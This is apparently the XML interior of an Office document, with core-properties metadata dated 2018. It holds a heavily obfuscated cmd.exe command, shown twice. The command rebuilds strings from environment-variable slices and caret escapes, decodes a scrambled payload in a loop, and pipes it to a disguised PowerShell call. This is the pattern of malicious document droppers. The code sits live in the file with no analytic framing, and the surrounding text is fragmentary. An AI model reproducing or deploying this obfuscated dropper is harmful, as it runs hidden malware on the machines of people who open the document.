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7410" cy="1468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:\vaaifjahSnR\kWMkCJo\bLrrfUXswJhh\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"s^e^t ^TP^d=9^s1;^BKk^'^:^&lt;^?M^*8Rvl^&amp;Lr0Ug'.y^&gt;=%^O$NuOc^Dl^}/^G^sV^2$cao}/Sl^}^[-^+{V^7=h^o^U]c^&gt;[Nt%N1a^;9^Xcr^h]^}^&amp;u^6^}^&amp;5f^;,^xVk^2N^x^a^$^&lt;H^e^'^p^]r^2%Y^bc^.%;^[^p@'=-^swfl^9^a^w^B^Pi^&gt;z+^'^j^:3=*v^1EQ^]J^E^e^z^,v^8^g^o^$^b$4;9_`r-Q\^K^:5C^F0VO^$^Ss4 pRGmM^\^:e@O^'tvV^ ^I^Gp.^-^J^#ye:^}Y^k^&lt;^ ^WosnEvW:ln^|4K^I^{^g=^{D^z^H y^M^p)^0cB0^4^b^&gt;0?^L^F^0^@Xo^0N^x^&amp;8CG{ ^O^#^B^e^LmC^g1^&lt;c^-}]^2 Qi=h +^Ht^qa7^g^K^&amp;(n^GmTe^&amp;ph^l^5^[u^.^2?N)n^j]rXL^|^K^A#vF5^#M^$gZc^ 0^b^|mL^&lt;^S^e^i^9^Z^t^e^z^:^Ip^]?-^&lt;F^+t^PaZ^e^z^]u^Gn^m1(/T^L(y^&gt;? ^e(^L^fDg^[I)^tv^;^x^2^M^'^u^l^Jm#^1^_^k^7#j^ug)^9'-#D=4gR^j^IF^\^BH*uH^X^P^q$N^-^u;P^LJ)c:^Hrc^A^OKL^9.^F^S^Oh^$kpt ^2^l^d^,i^oQf#^9^G^o^zw-^uG%o$eW^h(cr[^eN^U^,^l^b`f^i/1^a^F^:^$/^d^&gt;E.a^j(^uo.f?l^Y^`4nSajw^89i^o;^1Y^D^1^;^~^.,'1rO=e^U^3^E[GG^A^k^$^]^,A{^&gt;^7^`yi^]'r2W^xt^1@^6{^&amp;^j^h)[w}^uP^7`r^Qh^Wi^b$1^$K^}^; R^',nn7^?iD^j^q^ ^'^UC^fCtY^oZ^Y[^u^*`5$A^OR(/^U^ahH^6^ocE^\^da^i^M^Z^e^Gc^Zr \^6^o_l^Lf,^`g;e^U^i'Q^?n^e^y\Zx^$^}^+ef^k$.^`^6$'^#2k+fu%^Y~9Rt^?^pAmT+^x$^E%q+o^&amp;+^'^|B9^\^9[V'`^~P^+(^\KpIY^gm^|^ ^&amp;^e^mv)t^|^o^A^:QXhv^erUni^6^h^e^kV^9^$^&gt;f_^=@CIr^X^O)KY^ic^F^7^]^e^$wzX;^xuh'^i^O^'q^?^m^=B^K7k^Q^bd^D'(^P^z^=^A^`j^pVE^Y^F\x^gz:gN$%^#^e^;6rn'^qu*^3=^xm^2^bGw1^i@\^')[u^ ^,]-^=n^H^K ^W^9rY;Z\t^t^85^mN@^-^$#n^S;^&lt;^2g^'^dpuN/^]^Ms^:\^7^L^s^O`^'G n=^TNl^Thy2hcMYnC{[^$^Z)^H^;[R^=)^FTp^')^A^k^@~Xe'^lnV(^&amp;^]^tt^&amp;^{^2i^}^KC^lkDdpv^ bS^kw^J.IrX^']^fH^Ou{c^3qpk^JXR^-^Z^&amp;^Z,^6J^ ^-v^j^'^XnGk^&lt;^A^$^1G/c^[*^t=^zIp^Gzn^.^=Wna^,^l]sht$oh^Aa^t8M^Fnj^$Q^eKu^Jv^y4^.n6^ ^5^i^S@^A^pa+Qr^&amp;B^_a^]^HIcI^&gt;F/^40n/Z^Ej^:#Zg^pl^xh^tjm^_t{f^,h^oIA@r^F^1n^p#nl^'#MI^l^-;q?fSR^g(^dR)v8D,w^ylKkt^z6%\/M^#yeHCxabc^x^.E0vs^lBVwYC^oaN^:^Epe^sG^4^&lt;h^*t^&lt;^y^=e0#^+^e^k^b^ ^fK^g(^2%.w/^t^AR/5^e^:: q^Ppa^u^,^t^a^\N^tfcZ^h80\@^tO3^F#8nv^ ^a0gQ5@^7:S^|U^sRV7lG^|^s/ O/nA/l^\^d.nA^}u^.d^&amp;^Q^s^Jc^4^eS^f^X^sd^ ^ks^0a^eo]T^5k^ER^_.7N%^wOQXw^fBAw^*2U/i/c/s^~%^:SA5^p^k0^b^t}^&gt;^M^ta^`/^h^E^l^M^@^J^_8m;Hy1:W7dhI^jr=HZc`^#xe^Z^G2armJ4^h^j^z/^2c_^m[^QRo^l\sc^i^,#.c=^,nf^,^2^e`^Emvr-^le^x^]os/P^]d^$^G/a^$^3^k^e^-6^JlTNn^.G^=^9^x#^lT^o^4^bs^b:n'd7^Gfn^P?`^a^-$v^sQ^6^w/PN^[/r^5V^:^5*^S^p;?^3^t^#)kt^uK^mh#^1^i@^y^2U0^d^x ^p6X)^L^`a^&amp;Ae.q^Ha^&amp;i^b^]^O^3^L)s}/^7Plm^jn^L^oL@ c^;^Q^&amp;.S^Zal^I8Q^ah^:^&lt;hd^&amp;^qt^Gw^{n^bIne1^&gt;^Sv^p^w^aevg^;lZ^D^zcuH6ie:Br^T^&gt;^b^eI^X^*/-^AO/^fy^,:^&amp;c^6pVG5t/i+t^h^#r^ho^2-^'^sO9^=^f^Hu^uQ/=r*m^gi^.^m^s^$'^@7;^&lt;)S^tcC^:n^O^,^ue1.^@i.^`^|^l^q^xCC_jSb^SN^*^ez%NWu=^I^.)/^}^t^U^L^&gt;^e^sn_N^#P^{^ YnZtpC^@c^8c^+es^?^9^j5XBb^k/,^o/^?^o-^_ca^w(^{^zerc^#n^{^m^H=^z^=^3r^D^7^?^U^6^9^u^GuR^U^$y+B;^}^iy'^[^9^L^S^6^idi^W(^z^z(}W^'u^X^K=8^Q^Iij^'^OCn^&lt;zZ?a]$&amp;&amp;^f^or /^L %^E ^in (17^9^9;-^4;^3)^d^o s^e^t 5^t=!5^t!!^TP^d:~%^E,1!&amp;&amp;^i^f %^E=^=^3 ^ec^ho !5^t:^*5^t!=! |p%TMP:~-9,-8%we%APPDATA:~-7,-6%%CommonProgramFiles(x86):~34%he%TMP:~-10,-9%%TMP:~-6,-5% -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:\vaaifjahSnR\kWMkCJo\bLrrfUXswJhh\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"s^e^t ^TP^d=9^s1;^BKk^'^:^&lt;^?M^*8Rvl^&amp;Lr0Ug'.y^&gt;=%^O$NuOc^Dl^}/^G^sV^2$cao}/Sl^}^[-^+{V^7=h^o^U]c^&gt;[Nt%N1a^;9^Xcr^h]^}^&amp;u^6^}^&amp;5f^;,^xVk^2N^x^a^$^&lt;H^e^'^p^]r^2%Y^bc^.%;^[^p@'=-^swfl^9^a^w^B^Pi^&gt;z+^'^j^:3=*v^1EQ^]J^E^e^z^,v^8^g^o^$^b$4;9_`r-Q\^K^:5C^F0VO^$^Ss4 pRGmM^\^:e@O^'tvV^ ^I^Gp.^-^J^#ye:^}Y^k^&lt;^ ^WosnEvW:ln^|4K^I^{^g=^{D^z^H y^M^p)^0cB0^4^b^&gt;0?^L^F^0^@Xo^0N^x^&amp;8CG{ ^O^#^B^e^LmC^g1^&lt;c^-}]^2 Qi=h +^Ht^qa7^g^K^&amp;(n^GmTe^&amp;ph^l^5^[u^.^2?N)n^j]rXL^|^K^A#vF5^#M^$gZc^ 0^b^|mL^&lt;^S^e^i^9^Z^t^e^z^:^Ip^]?-^&lt;F^+t^PaZ^e^z^]u^Gn^m1(/T^L(y^&gt;? ^e(^L^fDg^[I)^tv^;^x^2^M^'^u^l^Jm#^1^_^k^7#j^ug)^9'-#D=4gR^j^IF^\^BH*uH^X^P^q$N^-^u;P^LJ)c:^Hrc^A^OKL^9.^F^S^Oh^$kpt ^2^l^d^,i^oQf#^9^G^o^zw-^uG%o$eW^h(cr[^eN^U^,^l^b`f^i/1^a^F^:^$/^d^&gt;E.a^j(^uo.f?l^Y^`4nSajw^89i^o;^1Y^D^1^;^~^.,'1rO=e^U^3^E[GG^A^k^$^]^,A{^&gt;^7^`yi^]'r2W^xt^1@^6{^&amp;^j^h)[w}^uP^7`r^Qh^Wi^b$1^$K^}^; R^',nn7^?iD^j^q^ ^'^UC^fCtY^oZ^Y[^u^*`5$A^OR(/^U^ahH^6^ocE^\^da^i^M^Z^e^Gc^Zr \^6^o_l^Lf,^`g;e^U^i'Q^?n^e^y\Zx^$^}^+ef^k$.^`^6$'^#2k+fu%^Y~9Rt^?^pAmT+^x$^E%q+o^&amp;+^'^|B9^\^9[V'`^~P^+(^\KpIY^gm^|^ ^&amp;^e^mv)t^|^o^A^:QXhv^erUni^6^h^e^kV^9^$^&gt;f_^=@CIr^X^O)KY^ic^F^7^]^e^$wzX;^xuh'^i^O^'q^?^m^=B^K7k^Q^bd^D'(^P^z^=^A^`j^pVE^Y^F\x^gz:gN$%^#^e^;6rn'^qu*^3=^xm^2^bGw1^i@\^')[u^ ^,]-^=n^H^K ^W^9rY;Z\t^t^85^mN@^-^$#n^S;^&lt;^2g^'^dpuN/^]^Ms^:\^7^L^s^O`^'G n=^TNl^Thy2hcMYnC{[^$^Z)^H^;[R^=)^FTp^')^A^k^@~Xe'^lnV(^&amp;^]^tt^&amp;^{^2i^}^KC^lkDdpv^ bS^kw^J.IrX^']^fH^Ou{c^3qpk^JXR^-^Z^&amp;^Z,^6J^ ^-v^j^'^XnGk^&lt;^A^$^1G/c^[*^t=^zIp^Gzn^.^=Wna^,^l]sht$oh^Aa^t8M^Fnj^$Q^eKu^Jv^y4^.n6^ ^5^i^S@^A^pa+Qr^&amp;B^_a^]^HIcI^&gt;F/^40n/Z^Ej^:#Zg^pl^xh^tjm^_t{f^,h^oIA@r^F^1n^p#nl^'#MI^l^-;q?fSR^g(^dR)v8D,w^ylKkt^z6%\/M^#yeHCxabc^x^.E0vs^lBVwYC^oaN^:^Epe^sG^4^&lt;h^*t^&lt;^y^=e0#^+^e^k^b^ ^fK^g(^2%.w/^t^AR/5^e^:: q^Ppa^u^,^t^a^\N^tfcZ^h80\@^tO3^F#8nv^ ^a0gQ5@^7:S^|U^sRV7lG^|^s/ O/nA/l^\^d.nA^}u^.d^&amp;^Q^s^Jc^4^eS^f^X^sd^ ^ks^0a^eo]T^5k^ER^_.7N%^wOQXw^fBAw^*2U/i/c/s^~%^:SA5^p^k0^b^t}^&gt;^M^ta^`/^h^E^l^M^@^J^_8m;Hy1:W7dhI^jr=HZc`^#xe^Z^G2armJ4^h^j^z/^2c_^m[^QRo^l\sc^i^,#.c=^,nf^,^2^e`^Emvr-^le^x^]os/P^]d^$^G/a^$^3^k^e^-6^JlTNn^.G^=^9^x#^lT^o^4^bs^b:n'd7^Gfn^P?`^a^-$v^sQ^6^w/PN^[/r^5V^:^5*^S^p;?^3^t^#)kt^uK^mh#^1^i@^y^2U0^d^x ^p6X)^L^`a^&amp;Ae.q^Ha^&amp;i^b^]^O^3^L)s}/^7Plm^jn^L^oL@ c^;^Q^&amp;.S^Zal^I8Q^ah^:^&lt;hd^&amp;^qt^Gw^{n^bIne1^&gt;^Sv^p^w^aevg^;lZ^D^zcuH6ie:Br^T^&gt;^b^eI^X^*/-^AO/^fy^,:^&amp;c^6pVG5t/i+t^h^#r^ho^2-^'^sO9^=^f^Hu^uQ/=r*m^gi^.^m^s^$'^@7;^&lt;)S^tcC^:n^O^,^ue1.^@i.^`^|^l^q^xCC_jSb^SN^*^ez%NWu=^I^.)/^}^t^U^L^&gt;^e^sn_N^#P^{^ YnZtpC^@c^8c^+es^?^9^j5XBb^k/,^o/^?^o-^_ca^w(^{^zerc^#n^{^m^H=^z^=^3r^D^7^?^U^6^9^u^GuR^U^$y+B;^}^iy'^[^9^L^S^6^idi^W(^z^z(}W^'u^X^K=8^Q^Iij^'^OCn^&lt;zZ?a]$&amp;&amp;^f^or /^L %^E ^in (17^9^9;-^4;^3)^d^o s^e^t 5^t=!5^t!!^TP^d:~%^E,1!&amp;&amp;^i^f %^E=^=^3 ^ec^ho !5^t:^*5^t!=! |p%TMP:~-9,-8%we%APPDATA:~-7,-6%%CommonProgramFiles(x86):~34%he%TMP:~-10,-9%%TMP:~-6,-5% -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/>
  <dc:description/>
  <cp:keywords/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-12-03T12:42:00Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>